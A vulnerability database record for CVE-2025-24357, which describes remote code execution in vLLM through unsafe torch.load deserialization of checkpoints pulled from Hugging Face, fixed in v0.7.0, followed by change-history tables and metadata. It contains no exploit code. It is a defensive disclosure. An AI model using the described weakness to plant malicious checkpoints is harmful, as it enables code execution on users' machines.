vLLM is a library for LLM inference and serving. vllm/model_executor/weight_utils.py implements hf_model_weights_iterator to load the model checkpoint, which is downloaded from huggingface. It uses the torch.load function and the weights_only parameter defaults to False. When torch.load loads malicious pickle data, it will execute arbitrary code during unpickling. This vulnerability is fixed in v0.7.0.
Metrics
Affected Vendors & Products
References
History
Fri, 27 Jun 2025 20:00:00 +0000
Type | Values Removed | Values Added |
---|---|---|
First Time appeared |
Vllm
Vllm vllm |
|
CPEs | cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* | |
Vendors & Products |
Vllm
Vllm vllm |
Fri, 07 Feb 2025 14:30:00 +0000
Type | Values Removed | Values Added |
---|---|---|
References |
| |
Metrics |
threat_severity
|
threat_severity
|
Mon, 27 Jan 2025 17:45:00 +0000
Type | Values Removed | Values Added |
---|---|---|
Description | vLLM is a library for LLM inference and serving. vllm/model_executor/weight_utils.py implements hf_model_weights_iterator to load the model checkpoint, which is downloaded from huggingface. It uses the torch.load function and the weights_only parameter defaults to False. When torch.load loads malicious pickle data, it will execute arbitrary code during unpickling. This vulnerability is fixed in v0.7.0. | |
Title | vLLM allows a malicious model RCE by torch.load in hf_model_weights_iterator | |
Weaknesses | CWE-502 | |
References |
| |
Metrics |
cvssV3_1
|

Status: PUBLISHED
Assigner: GitHub_M
Published:
Updated: 2025-02-12T20:41:36.324Z
Reserved: 2025-01-20T15:18:26.988Z
Link: CVE-2025-24357

No data.

Status : Analyzed
Published: 2025-01-27T18:15:41.523
Modified: 2025-06-27T19:30:59.223
Link: CVE-2025-24357
